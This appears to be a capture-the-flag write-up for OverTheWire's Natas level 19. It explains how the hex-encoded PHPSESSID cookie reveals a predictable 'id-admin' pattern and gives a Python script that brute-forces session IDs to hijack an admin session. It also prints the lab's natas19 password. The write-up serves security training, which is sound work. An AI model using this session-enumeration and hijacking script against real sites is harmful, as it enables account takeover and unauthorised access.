The page start with a message saying it is pretty much using the code from previous one except it is not sequential. Again, there is a username and a password field for you to login as admin and to retrieve credentials for natas20. No source code available. I entered a username: admin and password:password and intercepted the traffic using burp. Let see what the PHPSESSID looks like in the headers.
PHPSESSID=3534382d61646d696e; path=/; HttpOnly
That’s a lot of character for brute force. However, if you notice, the session id looks like hex. I quickly check what this is in ASCII.
That seems a little too good to be true. Notice I use the user admin, so let modify our last script to enumerate 1 to 640 (hopefully $maxid is still the same), append that with “-admin”, convert the whole thing into hex string, set the PHPSESSID and see if we can get the next password.
#!/bin/python3 import requests import binascii def str2byte(s): return bytes(s, encoding='utf-8') def byte2hex(b): return ''.join([hex(n)[2:].rjust(2,'0') for n in b]) def str2hex(s): return byte2hex(str2byte(s)) maxid = 641 user = "natas19" passwd = "4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs" url = "http://"+user+".natas.labs.overthewire.org" admin = '-admin' match = "You are an admin. The credentials for the next level are:" for i in range(maxid): c = dict(PHPSESSID=str2hex(str(i)+admin)) h = requests.get(url, auth=(user, passwd), cookies=c) if match in str(h.content): print (h.content) break
We got the next password in the content again (id=501). With the id at such high number in the last level, I had a temptation to run the range reverse or use random generator to pick my id. However, in real life, unless you had a reason to suspect the id is not generated randomly, there is no penalty to start from the lowest number to highest number for the brute force attack because the average guess will be the same ($maxid/2).
In the python code, I reuse codes from set 1 of the matasano crypto challenges. There are documentation on how to convert between binary and ASCII below.